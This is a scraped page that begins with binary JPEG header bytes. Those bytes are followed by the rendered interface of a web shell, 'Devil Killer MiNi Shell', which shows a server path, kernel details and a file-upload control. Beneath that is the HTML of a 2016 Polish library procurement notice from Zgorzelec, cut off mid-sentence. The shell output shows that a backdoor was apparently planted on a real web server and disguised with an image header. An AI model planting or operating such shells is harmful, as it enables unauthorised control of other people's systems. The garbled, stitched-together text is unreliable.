JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/153793-N-2016.html

<p class="kh_header"><b>Zgorzelec: Wyposażenie do Biblioteki Multimedialnej</b><br>
<b>Numer ogłoszenia: 153793 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Biblioteka Publiczna , ul. Boh. Getta 1, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 7752557, faks 0-75 7713315.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://biblioteka-zgorzelec.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie do Biblioteki Multimedialnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wraz z wniesieniem i montażem nowego, nieużywanego, pełnowartościowego, niewadliwego, dopuszczonego do użytku zgodnie z obowiązującymi przepisami oraz wolnego od wad fizycznych i prawnych, tj. nieobciążonego prawami osób trzecich, sprzętu i wyposażenia elektronicznego do lokalu znajdującego się w parterze budynku mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 przy ul. Orzeszkowej 30A, przebudowywanego na potrzeby Biblioteki Multimedialnej w Zgorzelcu.
2.   Dostawa i montaż obejmuje następujący sprzęt i wyposażenie:
a) Stół dotykowy Multu Touch składający się z:
- Monitora 42 z nakładką dotykową - 1 szt.
- Pakietu aplikacji z oprogramowaniem do ich modyfikacji oraz narzędziem do aktualizacji z poziomu laptopa  -  1 kpl.
-  Dedykowanej obudowy  -   1 szt.
-  Komputera serwerowego  -  1 szt.
b) System elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID HF składający się z:
- Bramki nadawczo-odbiorcza RFID raportującej; dwuantenowy system bramek kontrolnych wykonany ze szkła organicznego zabezpieczający przejście 500+1000+500mm.  -  1 szt.
- Połączonego stanowiska kodowania etykiet bibliotecznych RFID oraz wypożyczeń i zwrotów przez bibliotekarza. Musi ono zawierać: czytnik-koder etykiet RFID wraz z kablem USB 2.0. do podłączenia czytnika z komputerem oraz oprogramowanie (bez komputera stanowiskowego)   -  2 szt.
- Nośnika CD (płyta) wraz z wersją instalacyjną oprogramowania  - 1 szt.
- Inteligentnego elektronicznego licznika osób odwiedzających zintegrowanego z panelami bramki RFID  -  1 szt.
- Blokady elektromagnetycznej drzwi  -  1 szt.
- Etykiet bibliotecznych RFID przeznaczonych do zabezpieczania płyt CD/DVD  -  2000 szt.
- Etykiet bibliotecznych RFID zabezpieczających książki   -  1500 szt.
c) Pozostały sprzęt i wyposażenie elektroniczne obejmujące:
- Telewizor 47   -  1 szt.
- Uchwyt ścienny do telewizora  -  1 szt.
- Gramofon  -  2 szt.
- Wzmacniacz słuchawkowy do gramofonu  -  2 szt.
- Konsolę gier  -  1 szt.
- Słuchawki przewodowe  - 10 szt.
- Zestaw komputerowy AIO typ iMAC  - 2 kpl.
- Zestaw komputerowy AIO  -  4 kpl.
- Laptop  - 1 szt.
- Uchwyt do monitora  -  7 szt.
- Telefon  -  1 szt.
- Urządzenie wielofunkcyjne cb A4  -  1 szt.
- Urządzenie wielofunkcyjne kolor A3  -  1 szt.
- Stację odsłuchową CD  -  4 szt.
- UPS  -  2 szt.
- Listwy zasilające  - 10 szt.
- Oprogramowanie Microsoft Office 2010  -  6 szt.
- Oprogramowanie Photoshop CS6 PL Win  -  1 szt.
- Oprogramowanie CorelDRAW Graphics Suite X6 PL  - 1 szt.
- Aparat fotograficzny   -  1 szt.
- Serwer  - 1 szt.
- Montaż urządzeń, instalacja oprogramowania, szkolenie personelu MBP Zgorzelec  -  1 kpl.
3.   Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do niniejszej SIWZ.
4.	Opis przedmiotu zamówienia jest komplementarny w stosunku do projektu aranżacji wnętrz 
uwzględniając lokalizację elementów umeblowania i wyposażenia dodatkowego w lokalu znajdującym się w parterze budynku mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 
przy ul. Orzeszkowej 30A przebudowywanego na potrzeby  Biblioteki Multimedialnej w Zgorzelcu. 
5.   Wykonawca w ramach realizacji zamówienia zobowiązany jest dostarczyć wraz ze sprzętem 
      komputerowym i wyposażeniem elektronicznym:	
       a) niezbędne certyfikaty, atesty, licencje na oprogramowanie, karty gwarancyjne oraz instrukcje 
           obsługi w języku polskim.
       b) sprzęt komputerowy i wyposażenie elektroniczne wraz z zainstalowanym i aktywowanym na 
           rzecz MBP Zgorzelec kompletem oprogramowania i sterowników.
6.  Dostarczony sprzęt i wyposażenie muszą być fabrycznie nowe, sprawne technicznie,
      nieeksploatowane wcześniej przez innego użytkownika, wyprodukowane nie wcześniej niż w 
      pierwszym kwartale 2016 r., wolne od wad fizycznych rzeczy, jak również od jakichkolwiek 
     wad prawnych  i roszczeń osób trzecich.
7.  Wskazanie nazw zwyczajowych czy producentów w zamieszczonych elementach opisu przedmiotu 
      zamówienia (załącznik nr 1 do niniejszej SIWZ - Szczegółowy opis przedmiotu zamówienia) służy 
      wyłącznie określeniu standardu ich wykonania. Zamawiający dopuszcza rozwiązania równoważne 
      opisywanym. Wykonawca, który w trakcie realizacji zamówienia stosować będzie  rozwiązania
      równoważne opisywanym przez Zamawiającego, obowiązany będzie wykazać, że oferowany przez 
      niego sprzęt komputerowy i wyposażenie spełniają wymagania określone przez Zamawiającego. W 
      ramach czynności  odbiorowych (najpóźniej w dniu dostawy) Wykonawca dostarczy 
      Zamawiającemu , następujące dokumenty potwierdzające spełnienie przez dostarczony i 
      zamontowany sprzęt oraz  wyposażenie elektroniczne wszystkich wymagań określonych przez 
     Zamawiającego w załączniku nr 1 do niniejszej SIWZ:
      a) karty katalogowe oraz opisy techniczne dostarczonego sprzętu i urządzeń których producentem  
          nie jest Wykonawca (w tym wyniki testów PassMark CPU Mark dla zastosowanych w 
         sprzęcie komputerowym procesorów i PassMark G3D Mark dla zastosowanych w sprzęcie 
          komputerowym kart graficznych) , w języku polskim lub w przypadku braku kart 
          katalogowych i opisów technicznych dostarczonego sprzętu i urządzeń w języku polskim, w    
          języku angielskim lub niemieckim, z tłumaczeniem Wykonawcy na język polski
      b) karty katalogowe i opisy techniczne komponentów użytych do wykonania przez Wykonawcę   
          poszczególnych urządzeń (w tym wyniki testów PassMark CPU Mark dla zastosowanych w 
         sprzęcie komputerowym procesotów i PassMark G3D Mark dla zastosowanych w sprzęcie 
          komputerowym kart graficznych)w języku polskim lub w przypadku braku kart katalogowych i 
          opisów technicznych komponentów użytych do wykonania przez Wykonawcę poszczególnych     
          urządzeń w języku polskim, w języku angielskim lub niemieckim, z tłumaczeniem Wykonawcy na 
          język polski.
8. Wymagany okres rękojmi i gwarancji:
     Na dostarczony w ramach niniejszego zamówienia sprzęt i wyposażenie elektroniczne okres rękojmi 
     wynosi  24  miesiące licząc od dnia podpisania przez Zamawiającego protokołu odbioru dostawy bez uwag       
     Okres gwarancji Wykonawca określi w ofercie, przy czym nie może być on krótszy niż 24 miesiące.
 9. Zadanie dofinansowane ze środków Ministerstwa Kultury i Dziedzictwa Narodowego, reprezentowanego 
     przez Instytut Książki w Krakowie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-0, 30.23.60.00-2, 30.23.13.00-0, 30.23.13.20-6, 72.26.00.00-5, 48.82.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca wniesie wadium w wysokości 5100,- zł przed upływem terminu składania    
           ofert, tj. przed 02.08.2016 r. godz. 12:30
       2. W zależności od decyzji Wykonawcy wadium może być wnoszone w formach:
           a) pieniądzu (przelew na rachunek bankowy wskazany przez Zamawiającego),
           b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
               kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
           c) gwarancjach bankowych,
           d) gwarancjach ubezpieczeniowych,
           e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z   
              dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. 
              U. z 2007 r. Nr 42, poz. 275 ze zm.).
       3. W przypadku wnoszenia wadium w formach, o których mowa w pkt. 2  lit. od b do e oryginał 
           gwarancji/poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie z 
           zapisami ustawy Prawo Zamówień Publicznych.
       4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
           Zamawiającego Bank PeKaO S.A O/ Zgorzelec nr 18 1240 1297 1111 0010 6448 0087, z 
           zaznaczeniem Wadium do postępowania nr MBP.271.02.2016 /kopię przelewu (wpłaty) 
           proszę dołączyć do oferty/.
           Skuteczne wniesienie wadium następuje w chwili uznania (zaksięgowania) kwoty wadium na 
           rachunku bankowym Zamawiającego, co oznacza, iż wadium musi znaleźć się na rachunku 
           Zamawiającego najpóźniej do dnia oraz godziny wyznaczonych jako termin składania ofert.
       5. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie 
            wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie uznana za 
            odrzuconą zgodnie z art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.
       6.  Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty 
            najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta 
            została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.7.
        7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na 
            wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, z przyczyn 
            leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
            ust. 1 ustawy Prawo Zamówień Publicznych, pełnomocnictw, listy podmiotów należących do 
            tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień 
            Publicznych lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody 
            na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Prawo Zamówień 
            Publicznych, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę 
            jako najkorzystniejszej.
       8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z 
           umowy rachunku bankowego, na którym było ono przechowywane,  pomniejszone o koszty 
           prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
           wskazany przez Wykonawcę.
      9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
          wybrana:
          a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych   
             w ofercie,
          b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
          c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
             leżących po stronie wykonawcy.
    10. W przypadku wniesienia wadium w formach wymienionych w pkt. 2  lit. od b do e 
           z treści dokumentu dot. Wadium musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy 
          gwarancyjnej nastąpi także w przypadku określonym w pkt. 7 
    11. Wadium do postępowania wniesione tylko przez jednego z Wykonawców, o których mowa w 
          pkt. VIII  SIWZ uważa się za wniesione prawidłowo w imieniu wykonawców wspólnie 
          ubiegających się o udzielenie zamówienia.
    12. Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny 
           i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. XIII ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca oprócz złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt. XIII ppkt. 2  SIWZ, złoży również wskazany w pkt. XIII ppkt. 6 SIWZ, wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych, głównych dostaw zgodnych z przedmiotem zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane wraz z załączeniem dowodów, że zostały one wykonane lub są wykonywane należycie.
Zamawiający żąda wykazania w wykazie minimum 2 dostaw sprzętu i wyposażenia elektronicznego z 
oprogramowaniem o wartości każdej z tych dostaw minimum 60.000 PLN netto. Zamawiający żąda aby minimum jedna z wykazanych w wykazie dostaw obejmowała swym zakresem dostawę, instalację
i wdrożenie systemu ochrony i identyfikacji w jednorodnej technologii RFID HF wraz z niezbędnym 
osprzętem         
Zamawiający informuje, iż w przypadku gdy Wykonawca przedstawi w wykazie dostaw,  kwotę    
wyrażoną w innej walucie niż PLN, Zamawiający do oceny spełniania warunku przyjmie średni kurs tej 
waluty w stosunku do PLN publikowany przez NBP z dnia otwarcia ofert.
Dowodami, o których mowa w powyżej są:
- poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu 
składania ofert;
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
 W przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania niniejszych dowodów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o   którym mowa w pkt. XIII  ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o   którym mowa w pkt. XIII  ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o   którym mowa w pkt. XIII  ppkt. 2 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>minimum 2 dostawy sprzętu i wyposażenia elektronicznego z oprogramowaniem o wartości każdej z tych dostaw minimum 60.000 PLN netto. Zamawiający żąda aby minimum jedna z wykazanych w wykazie dostaw obejmowała swym zakresem dostawę, instalację i wdrożenie systemu ochrony i identyfikacji w jednorodnej technologii RFID HF wraz z niezbędnym  osprzętem;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 2 do SIWZ, 
2.	Pisemne zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów,  na potrzeby
       wykonania zamówienia - załącznik nr 7 SIWZ,
3.   Ewentualne pełnomocnictwo do podpisania oferty i jej załączników, zgodnie z zapisami pkt. 8  SIWZ, o ile prawo do 
      podpisywania oferty nie wynika z innych dokumentów złożonych wraz z ofertą,
4.  Formularz oświadczenia dot. podwykonawstwa - załącznik nr 8 do SIWZ.
    W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że 
    Wykonawca wykona zamówienie własnymi siłami.
5. Dokument potwierdzający wniesienie wadium do postępowania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-  Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wystąpienia 
